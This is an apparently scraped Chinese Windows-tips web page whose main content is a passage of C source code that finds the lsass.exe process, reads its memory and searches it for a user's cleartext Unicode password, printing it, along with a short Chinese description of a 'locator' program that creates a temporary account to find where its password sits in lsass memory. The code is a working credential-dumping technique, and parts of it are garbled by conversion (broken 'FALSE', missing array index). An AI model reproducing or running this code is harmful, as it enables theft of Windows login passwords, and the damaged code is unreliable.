熱搜:win11繞過硬件限制安裝 一鍵重裝Win10系統(tǒng) 最干凈的u盤啟動(dòng)盤 真正純凈版的win7系統(tǒng)
時(shí)間:2012-10-29 14:30:41 作者:木木 來源:系統(tǒng)之家 1. 掃描二維碼隨時(shí)看資訊 2. 請(qǐng)使用手機(jī)瀏覽器訪問: https://m.xitongzhijia.net/xtjc/20121029/17921.html 手機(jī)查看 評(píng)論 反饋
{
if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well,We Fail To Find The Password,And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot\n");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = ;
DWORD ByteGet = 0;
int Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ,F(xiàn)ALSE,PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memory\n");
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n",F(xiàn)ound + BaseAddress,Password);
}
}
else
{
printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File
附件程序相當(dāng)于密碼定位程序,用來測試在lsass內(nèi)存中搜索指定的字符串或模擬登陸的密碼.
用法:
1.locator 字符串 -> 在lsass進(jìn)程內(nèi)存中搜索指定的那個(gè)"字符串",返回確定的位置
2.Locator 用戶名 密碼 -> 在系統(tǒng)中建立一個(gè)參數(shù)指定的用戶,并進(jìn)行模擬登陸,然后搜索"密碼"在lsass進(jìn)程內(nèi)存中的位置,生成的帳戶程序運(yùn)行完后會(huì)自動(dòng)刪除。
發(fā)表評(píng)論
共0條
評(píng)論就這些咯,讓大家也知道你的獨(dú)特見解
立即評(píng)論以上留言僅代表用戶個(gè)人觀點(diǎn),不代表系統(tǒng)之家立場